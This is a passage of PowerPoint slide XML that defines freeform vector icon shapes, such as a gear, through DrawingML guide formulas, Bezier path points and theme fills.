                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26EF88E0-41A4-A14B-AC22-22A796370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9720" y="3257874"/>
              <a:ext cx="45310" cy="44439"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 27 w 197"/>
                <a:gd name="T1" fmla="*/ 194 h 194"/>
                <a:gd name="T2" fmla="*/ 10 w 197"/>
                <a:gd name="T3" fmla="*/ 187 h 194"/>
                <a:gd name="T4" fmla="*/ 10 w 197"/>
                <a:gd name="T5" fmla="*/ 151 h 194"/>
                <a:gd name="T6" fmla="*/ 151 w 197"/>
                <a:gd name="T7" fmla="*/ 9 h 194"/>
                <a:gd name="T8" fmla="*/ 187 w 197"/>
                <a:gd name="T9" fmla="*/ 9 h 194"/>
                <a:gd name="T10" fmla="*/ 187 w 197"/>
                <a:gd name="T11" fmla="*/ 45 h 194"/>
                <a:gd name="T12" fmla="*/ 45 w 197"/>
                <a:gd name="T13" fmla="*/ 187 h 194"/>
                <a:gd name="T14" fmla="*/ 27 w 197"/>
                <a:gd name="T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94">
                  <a:moveTo>
                    <a:pt x="27" y="194"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="194"/>
                    <a:pt x="15" y="192"/>
                    <a:pt x="10" y="187"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="177"/>
                    <a:pt x="0" y="161"/>
                    <a:pt x="10" y="151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61" y="0"/>
                    <a:pt x="177" y="0"/>
                    <a:pt x="187" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="197" y="19"/>
                    <a:pt x="197" y="35"/>
                    <a:pt x="187" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="187"/>
                    <a:pt x="45" y="187"/>
                    <a:pt x="45" y="187"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="192"/>
                    <a:pt x="34" y="194"/>
                    <a:pt x="27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84" name="Freeform 287">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B8FFAF1-7A49-4E44-AB62-288F6ABD5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0720" y="3236962"/>
              <a:ext cx="174270" cy="195182"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 87 w 757"/>
                <a:gd name="T1" fmla="*/ 845 h 845"/>
                <a:gd name="T2" fmla="*/ 25 w 757"/>
                <a:gd name="T3" fmla="*/ 819 h 845"/>
                <a:gd name="T4" fmla="*/ 0 w 757"/>
                <a:gd name="T5" fmla="*/ 758 h 845"/>
                <a:gd name="T6" fmla="*/ 25 w 757"/>
                <a:gd name="T7" fmla="*/ 696 h 845"/>
                <a:gd name="T8" fmla="*/ 711 w 757"/>
                <a:gd name="T9" fmla="*/ 10 h 845"/>
                <a:gd name="T10" fmla="*/ 747 w 757"/>
                <a:gd name="T11" fmla="*/ 10 h 845"/>
                <a:gd name="T12" fmla="*/ 747 w 757"/>
                <a:gd name="T13" fmla="*/ 46 h 845"/>
                <a:gd name="T14" fmla="*/ 61 w 757"/>
                <a:gd name="T15" fmla="*/ 732 h 845"/>
                <a:gd name="T16" fmla="*/ 50 w 757"/>
                <a:gd name="T17" fmla="*/ 758 h 845"/>
                <a:gd name="T18" fmla="*/ 61 w 757"/>
                <a:gd name="T19" fmla="*/ 783 h 845"/>
                <a:gd name="T20" fmla="*/ 112 w 757"/>
                <a:gd name="T21" fmla="*/ 783 h 845"/>
                <a:gd name="T22" fmla="*/ 580 w 757"/>
                <a:gd name="T23" fmla="*/ 316 h 845"/>
                <a:gd name="T24" fmla="*/ 616 w 757"/>
                <a:gd name="T25" fmla="*/ 316 h 845"/>
                <a:gd name="T26" fmla="*/ 616 w 757"/>
                <a:gd name="T27" fmla="*/ 352 h 845"/>
                <a:gd name="T28" fmla="*/ 148 w 757"/>
                <a:gd name="T29" fmla="*/ 819 h 845"/>
                <a:gd name="T30" fmla="*/ 87 w 757"/>
                <a:gd name="T31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7" h="845">
                  <a:moveTo>
                    <a:pt x="87" y="845"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="845"/>
                    <a:pt x="42" y="836"/>
                    <a:pt x="25" y="819"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="803"/>
                    <a:pt x="0" y="781"/>
                    <a:pt x="0" y="758"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="734"/>
                    <a:pt x="9" y="712"/>
                    <a:pt x="25" y="696"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="711" y="10"/>
                    <a:pt x="711" y="10"/>
                    <a:pt x="711" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="721" y="0"/>
                    <a:pt x="737" y="0"/>
                    <a:pt x="747" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="757" y="20"/>
                    <a:pt x="757" y="36"/>
                    <a:pt x="747" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="732"/>
                    <a:pt x="61" y="732"/>
                    <a:pt x="61" y="732"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="739"/>
                    <a:pt x="50" y="748"/>
                    <a:pt x="50" y="758"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="767"/>
                    <a:pt x="54" y="777"/>
                    <a:pt x="61" y="783"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="798"/>
                    <a:pt x="98" y="798"/>
                    <a:pt x="112" y="783"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="580" y="316"/>
                    <a:pt x="580" y="316"/>
                    <a:pt x="580" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="590" y="306"/>
                    <a:pt x="606" y="306"/>
                    <a:pt x="616" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="626" y="326"/>
                    <a:pt x="626" y="342"/>
                    <a:pt x="616" y="352"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="819"/>
                    <a:pt x="148" y="819"/>
                    <a:pt x="148" y="819"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="836"/>
                    <a:pt x="109" y="845"/>
                    <a:pt x="87" y="8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85" name="Freeform 289">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32C45BB1-B67B-8442-8A53-6018DF523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1422" y="3317997"/>
              <a:ext cx="121989" cy="121117"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 28 w 528"/>
                <a:gd name="T1" fmla="*/ 526 h 526"/>
                <a:gd name="T2" fmla="*/ 10 w 528"/>
                <a:gd name="T3" fmla="*/ 518 h 526"/>
                <a:gd name="T4" fmla="*/ 10 w 528"/>
                <a:gd name="T5" fmla="*/ 483 h 526"/>
                <a:gd name="T6" fmla="*/ 483 w 528"/>
                <a:gd name="T7" fmla="*/ 10 h 526"/>
                <a:gd name="T8" fmla="*/ 519 w 528"/>
                <a:gd name="T9" fmla="*/ 10 h 526"/>
                <a:gd name="T10" fmla="*/ 519 w 528"/>
                <a:gd name="T11" fmla="*/ 45 h 526"/>
                <a:gd name="T12" fmla="*/ 46 w 528"/>
                <a:gd name="T13" fmla="*/ 518 h 526"/>
                <a:gd name="T14" fmla="*/ 28 w 528"/>
                <a:gd name="T15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8" h="526">
                  <a:moveTo>
                    <a:pt x="28" y="526"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="526"/>
                    <a:pt x="15" y="523"/>
                    <a:pt x="10" y="518"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="508"/>
                    <a:pt x="0" y="492"/>
                    <a:pt x="10" y="483"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="483" y="10"/>
                    <a:pt x="483" y="10"/>
                    <a:pt x="483" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="493" y="0"/>
                    <a:pt x="509" y="0"/>
                    <a:pt x="519" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="528" y="19"/>
                    <a:pt x="528" y="36"/>
                    <a:pt x="519" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="518"/>
                    <a:pt x="46" y="518"/>
                    <a:pt x="46" y="518"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="523"/>
                    <a:pt x="34" y="526"/>
                    <a:pt x="28" y="5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86" name="Freeform 290">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{906001B2-BDC8-9846-856A-04D9BCCA1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8229" y="3297956"/>
              <a:ext cx="175141" cy="193439"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 96 w 760"/>
                <a:gd name="T1" fmla="*/ 839 h 839"/>
                <a:gd name="T2" fmla="*/ 34 w 760"/>
                <a:gd name="T3" fmla="*/ 813 h 839"/>
                <a:gd name="T4" fmla="*/ 34 w 760"/>
                <a:gd name="T5" fmla="*/ 690 h 839"/>
                <a:gd name="T6" fmla="*/ 714 w 760"/>
                <a:gd name="T7" fmla="*/ 10 h 839"/>
                <a:gd name="T8" fmla="*/ 750 w 760"/>
                <a:gd name="T9" fmla="*/ 10 h 839"/>
                <a:gd name="T10" fmla="*/ 750 w 760"/>
                <a:gd name="T11" fmla="*/ 46 h 839"/>
                <a:gd name="T12" fmla="*/ 70 w 760"/>
                <a:gd name="T13" fmla="*/ 726 h 839"/>
                <a:gd name="T14" fmla="*/ 70 w 760"/>
                <a:gd name="T15" fmla="*/ 778 h 839"/>
                <a:gd name="T16" fmla="*/ 122 w 760"/>
                <a:gd name="T17" fmla="*/ 778 h 839"/>
                <a:gd name="T18" fmla="*/ 191 w 760"/>
                <a:gd name="T19" fmla="*/ 709 h 839"/>
                <a:gd name="T20" fmla="*/ 227 w 760"/>
                <a:gd name="T21" fmla="*/ 709 h 839"/>
                <a:gd name="T22" fmla="*/ 227 w 760"/>
                <a:gd name="T23" fmla="*/ 744 h 839"/>
                <a:gd name="T24" fmla="*/ 158 w 760"/>
                <a:gd name="T25" fmla="*/ 813 h 839"/>
                <a:gd name="T26" fmla="*/ 96 w 760"/>
                <a:gd name="T27" fmla="*/ 839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0" h="839">
                  <a:moveTo>
                    <a:pt x="96" y="839"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="839"/>
                    <a:pt x="51" y="830"/>
                    <a:pt x="34" y="813"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="779"/>
                    <a:pt x="0" y="724"/>
                    <a:pt x="34" y="690"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="714" y="10"/>
                    <a:pt x="714" y="10"/>
                    <a:pt x="714" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="724" y="0"/>
                    <a:pt x="740" y="0"/>
                    <a:pt x="750" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="760" y="20"/>
                    <a:pt x="760" y="36"/>
                    <a:pt x="750" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="726"/>
                    <a:pt x="70" y="726"/>
                    <a:pt x="70" y="726"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="740"/>
                    <a:pt x="56" y="763"/>
                    <a:pt x="70" y="778"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="792"/>
                    <a:pt x="108" y="792"/>
                    <a:pt x="122" y="778"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="709"/>
                    <a:pt x="191" y="709"/>
                    <a:pt x="191" y="709"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="201" y="699"/>
                    <a:pt x="217" y="699"/>
                    <a:pt x="227" y="709"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="236" y="718"/>
                    <a:pt x="236" y="734"/>
                    <a:pt x="227" y="744"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="813"/>
                    <a:pt x="158" y="813"/>
                    <a:pt x="158" y="813"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="141" y="830"/>
                    <a:pt x="118" y="839"/>
                    <a:pt x="96" y="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87" name="Freeform 291">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59AA2F7D-44D7-674D-80FB-326EBCA4B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5989" y="3406003"/>
              <a:ext cx="60123" cy="59252"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 147 w 260"/>
                <a:gd name="T1" fmla="*/ 259 h 259"/>
                <a:gd name="T2" fmla="*/ 43 w 260"/>
                <a:gd name="T3" fmla="*/ 216 h 259"/>
                <a:gd name="T4" fmla="*/ 0 w 260"/>
                <a:gd name="T5" fmla="*/ 113 h 259"/>
                <a:gd name="T6" fmla="*/ 43 w 260"/>
                <a:gd name="T7" fmla="*/ 10 h 259"/>
                <a:gd name="T8" fmla="*/ 79 w 260"/>
                <a:gd name="T9" fmla="*/ 10 h 259"/>
                <a:gd name="T10" fmla="*/ 79 w 260"/>
                <a:gd name="T11" fmla="*/ 45 h 259"/>
                <a:gd name="T12" fmla="*/ 51 w 260"/>
                <a:gd name="T13" fmla="*/ 113 h 259"/>
                <a:gd name="T14" fmla="*/ 79 w 260"/>
                <a:gd name="T15" fmla="*/ 181 h 259"/>
                <a:gd name="T16" fmla="*/ 214 w 260"/>
                <a:gd name="T17" fmla="*/ 181 h 259"/>
                <a:gd name="T18" fmla="*/ 250 w 260"/>
                <a:gd name="T19" fmla="*/ 181 h 259"/>
                <a:gd name="T20" fmla="*/ 250 w 260"/>
                <a:gd name="T21" fmla="*/ 216 h 259"/>
                <a:gd name="T22" fmla="*/ 147 w 260"/>
                <a:gd name="T23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0" h="259">
                  <a:moveTo>
                    <a:pt x="147" y="259"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="259"/>
                    <a:pt x="71" y="244"/>
                    <a:pt x="43" y="216"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="189"/>
                    <a:pt x="0" y="152"/>
                    <a:pt x="0" y="113"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="74"/>
                    <a:pt x="16" y="37"/>
                    <a:pt x="43" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="0"/>
                    <a:pt x="69" y="0"/>
                    <a:pt x="79" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="89" y="20"/>
                    <a:pt x="89" y="36"/>
                    <a:pt x="79" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="63"/>
                    <a:pt x="51" y="87"/>
                    <a:pt x="51" y="113"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="139"/>
                    <a:pt x="61" y="162"/>
                    <a:pt x="79" y="181"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="217"/>
                    <a:pt x="178" y="217"/>
                    <a:pt x="214" y="181"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="224" y="171"/>
                    <a:pt x="240" y="171"/>
                    <a:pt x="250" y="181"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="260" y="190"/>
                    <a:pt x="260" y="206"/>
                    <a:pt x="250" y="216"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="222" y="244"/>
                    <a:pt x="186" y="259"/>
                    <a:pt x="147" y="2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84BC16A-77C8-714A-8503-A7C3ED8A484B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8413698" y="5183899"/>
            <a:ext cx="399948" cy="399077"/>
            <a:chOff x="22142450" y="155575"/>
            <a:chExt cx="728663" cy="727076"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="189" name="Freeform 101">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0C4C9CF-B5C9-C84D-8DFC-D8DF715675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48838" y="460375"/>
              <a:ext cx="115888" cy="115888"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 139 w 278"/>
                <a:gd name="T1" fmla="*/ 278 h 278"/>
                <a:gd name="T2" fmla="*/ 0 w 278"/>
                <a:gd name="T3" fmla="*/ 139 h 278"/>
                <a:gd name="T4" fmla="*/ 139 w 278"/>
                <a:gd name="T5" fmla="*/ 0 h 278"/>
                <a:gd name="T6" fmla="*/ 278 w 278"/>
                <a:gd name="T7" fmla="*/ 139 h 278"/>
                <a:gd name="T8" fmla="*/ 139 w 278"/>
                <a:gd name="T9" fmla="*/ 278 h 278"/>
                <a:gd name="T10" fmla="*/ 139 w 278"/>
                <a:gd name="T11" fmla="*/ 51 h 278"/>
                <a:gd name="T12" fmla="*/ 51 w 278"/>
                <a:gd name="T13" fmla="*/ 139 h 278"/>
                <a:gd name="T14" fmla="*/ 139 w 278"/>
                <a:gd name="T15" fmla="*/ 228 h 278"/>
                <a:gd name="T16" fmla="*/ 227 w 278"/>
                <a:gd name="T17" fmla="*/ 139 h 278"/>
                <a:gd name="T18" fmla="*/ 139 w 278"/>
                <a:gd name="T19" fmla="*/ 5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278">
                  <a:moveTo>
                    <a:pt x="139" y="278"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="278"/>
                    <a:pt x="0" y="216"/>
                    <a:pt x="0" y="139"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="63"/>
                    <a:pt x="62" y="0"/>
                    <a:pt x="139" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="215" y="0"/>
                    <a:pt x="278" y="63"/>
                    <a:pt x="278" y="139"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="278" y="216"/>
                    <a:pt x="215" y="278"/>
                    <a:pt x="139" y="278"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="139" y="51"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="90" y="51"/>
                    <a:pt x="51" y="91"/>
                    <a:pt x="51" y="139"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="188"/>
                    <a:pt x="90" y="228"/>
                    <a:pt x="139" y="228"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="228"/>
                    <a:pt x="227" y="188"/>
                    <a:pt x="227" y="139"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="227" y="91"/>
                    <a:pt x="188" y="51"/>
                    <a:pt x="13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90" name="Freeform 102">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{122D6DEE-E4BF-5C42-B71C-DD5E49E12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9300" y="352425"/>
              <a:ext cx="334963" cy="333375"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 310 w 797"/>
                <a:gd name="T1" fmla="*/ 744 h 797"/>
                <a:gd name="T2" fmla="*/ 235 w 797"/>
                <a:gd name="T3" fmla="*/ 690 h 797"/>
                <a:gd name="T4" fmla="*/ 142 w 797"/>
                <a:gd name="T5" fmla="*/ 704 h 797"/>
                <a:gd name="T6" fmla="*/ 106 w 797"/>
                <a:gd name="T7" fmla="*/ 564 h 797"/>
                <a:gd name="T8" fmla="*/ 74 w 797"/>
                <a:gd name="T9" fmla="*/ 487 h 797"/>
                <a:gd name="T10" fmla="*/ 0 w 797"/>
                <a:gd name="T11" fmla="*/ 363 h 797"/>
                <a:gd name="T12" fmla="*/ 77 w 797"/>
                <a:gd name="T13" fmla="*/ 307 h 797"/>
                <a:gd name="T14" fmla="*/ 92 w 797"/>
                <a:gd name="T15" fmla="*/ 216 h 797"/>
                <a:gd name="T16" fmla="*/ 217 w 797"/>
                <a:gd name="T17" fmla="*/ 90 h 797"/>
                <a:gd name="T18" fmla="*/ 197 w 797"/>
                <a:gd name="T19" fmla="*/ 142 h 797"/>
                <a:gd name="T20" fmla="*/ 178 w 797"/>
                <a:gd name="T21" fmla="*/ 126 h 797"/>
                <a:gd name="T22" fmla="*/ 143 w 797"/>
                <a:gd name="T23" fmla="*/ 195 h 797"/>
                <a:gd name="T24" fmla="*/ 74 w 797"/>
                <a:gd name="T25" fmla="*/ 360 h 797"/>
                <a:gd name="T26" fmla="*/ 51 w 797"/>
                <a:gd name="T27" fmla="*/ 434 h 797"/>
                <a:gd name="T28" fmla="*/ 125 w 797"/>
                <a:gd name="T29" fmla="*/ 476 h 797"/>
                <a:gd name="T30" fmla="*/ 128 w 797"/>
                <a:gd name="T31" fmla="*/ 615 h 797"/>
                <a:gd name="T32" fmla="*/ 181 w 797"/>
                <a:gd name="T33" fmla="*/ 668 h 797"/>
                <a:gd name="T34" fmla="*/ 260 w 797"/>
                <a:gd name="T35" fmla="*/ 646 h 797"/>
                <a:gd name="T36" fmla="*/ 361 w 797"/>
                <a:gd name="T37" fmla="*/ 744 h 797"/>
                <a:gd name="T38" fmla="*/ 437 w 797"/>
                <a:gd name="T39" fmla="*/ 744 h 797"/>
                <a:gd name="T40" fmla="*/ 537 w 797"/>
                <a:gd name="T41" fmla="*/ 646 h 797"/>
                <a:gd name="T42" fmla="*/ 620 w 797"/>
                <a:gd name="T43" fmla="*/ 668 h 797"/>
                <a:gd name="T44" fmla="*/ 670 w 797"/>
                <a:gd name="T45" fmla="*/ 615 h 797"/>
                <a:gd name="T46" fmla="*/ 672 w 797"/>
                <a:gd name="T47" fmla="*/ 476 h 797"/>
                <a:gd name="T48" fmla="*/ 747 w 797"/>
                <a:gd name="T49" fmla="*/ 434 h 797"/>
                <a:gd name="T50" fmla="*/ 724 w 797"/>
                <a:gd name="T51" fmla="*/ 360 h 797"/>
                <a:gd name="T52" fmla="*/ 655 w 797"/>
                <a:gd name="T53" fmla="*/ 195 h 797"/>
                <a:gd name="T54" fmla="*/ 620 w 797"/>
                <a:gd name="T55" fmla="*/ 126 h 797"/>
                <a:gd name="T56" fmla="*/ 536 w 797"/>
                <a:gd name="T57" fmla="*/ 150 h 797"/>
                <a:gd name="T58" fmla="*/ 437 w 797"/>
                <a:gd name="T59" fmla="*/ 53 h 797"/>
                <a:gd name="T60" fmla="*/ 361 w 797"/>
                <a:gd name="T61" fmla="*/ 53 h 797"/>
                <a:gd name="T62" fmla="*/ 290 w 797"/>
                <a:gd name="T63" fmla="*/ 107 h 797"/>
                <a:gd name="T64" fmla="*/ 310 w 797"/>
                <a:gd name="T65" fmla="*/ 53 h 797"/>
                <a:gd name="T66" fmla="*/ 488 w 797"/>
                <a:gd name="T67" fmla="*/ 53 h 797"/>
                <a:gd name="T68" fmla="*/ 561 w 797"/>
                <a:gd name="T69" fmla="*/ 106 h 797"/>
                <a:gd name="T70" fmla="*/ 656 w 797"/>
                <a:gd name="T71" fmla="*/ 90 h 797"/>
                <a:gd name="T72" fmla="*/ 706 w 797"/>
                <a:gd name="T73" fmla="*/ 216 h 797"/>
                <a:gd name="T74" fmla="*/ 721 w 797"/>
                <a:gd name="T75" fmla="*/ 307 h 797"/>
                <a:gd name="T76" fmla="*/ 797 w 797"/>
                <a:gd name="T77" fmla="*/ 363 h 797"/>
                <a:gd name="T78" fmla="*/ 724 w 797"/>
                <a:gd name="T79" fmla="*/ 487 h 797"/>
                <a:gd name="T80" fmla="*/ 691 w 797"/>
                <a:gd name="T81" fmla="*/ 564 h 797"/>
                <a:gd name="T82" fmla="*/ 706 w 797"/>
                <a:gd name="T83" fmla="*/ 654 h 797"/>
                <a:gd name="T84" fmla="*/ 566 w 797"/>
                <a:gd name="T85" fmla="*/ 690 h 797"/>
                <a:gd name="T86" fmla="*/ 488 w 797"/>
                <a:gd name="T87" fmla="*/ 72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7" h="797">
                  <a:moveTo>
                    <a:pt x="434" y="797"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="363" y="797"/>
                    <a:pt x="363" y="797"/>
                    <a:pt x="363" y="797"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="334" y="797"/>
                    <a:pt x="310" y="773"/>
                    <a:pt x="310" y="744"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="310" y="723"/>
                    <a:pt x="310" y="723"/>
                    <a:pt x="310" y="723"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="310" y="722"/>
                    <a:pt x="309" y="721"/>
                    <a:pt x="307" y="721"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="283" y="714"/>
                    <a:pt x="258" y="703"/>
                    <a:pt x="235" y="690"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="234" y="689"/>
                    <a:pt x="232" y="689"/>
                    <a:pt x="231" y="690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197" y="724"/>
                    <a:pt x="162" y="724"/>
                    <a:pt x="142" y="704"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="92" y="654"/>
                    <a:pt x="92" y="654"/>
                    <a:pt x="92" y="654"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="633"/>
                    <a:pt x="71" y="599"/>
                    <a:pt x="92" y="579"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="564"/>
                    <a:pt x="106" y="564"/>
                    <a:pt x="106" y="564"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="563"/>
                    <a:pt x="107" y="562"/>
                    <a:pt x="106" y="560"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="538"/>
                    <a:pt x="84" y="514"/>
                    <a:pt x="77" y="490"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="488"/>
                    <a:pt x="75" y="487"/>
                    <a:pt x="74" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="487"/>
                    <a:pt x="53" y="487"/>
                    <a:pt x="53" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="487"/>
                    <a:pt x="0" y="463"/>
                    <a:pt x="0" y="434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34"/>
                    <a:pt x="24" y="310"/>
                    <a:pt x="53" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="310"/>
                    <a:pt x="74" y="310"/>
                    <a:pt x="74" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="310"/>
                    <a:pt x="76" y="308"/>
                    <a:pt x="77" y="307"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="282"/>
                    <a:pt x="94" y="258"/>
                    <a:pt x="107" y="235"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="234"/>
                    <a:pt x="108" y="232"/>
                    <a:pt x="107" y="231"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="92" y="216"/>
                    <a:pt x="92" y="216"/>
                    <a:pt x="92" y="216"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="195"/>
                    <a:pt x="71" y="161"/>
                    <a:pt x="92" y="141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62" y="70"/>
                    <a:pt x="197" y="70"/>
                    <a:pt x="217" y="90"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="233" y="106"/>
                    <a:pt x="233" y="106"/>
                    <a:pt x="233" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="243" y="116"/>
                    <a:pt x="243" y="132"/>
                    <a:pt x="233" y="142"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="223" y="152"/>
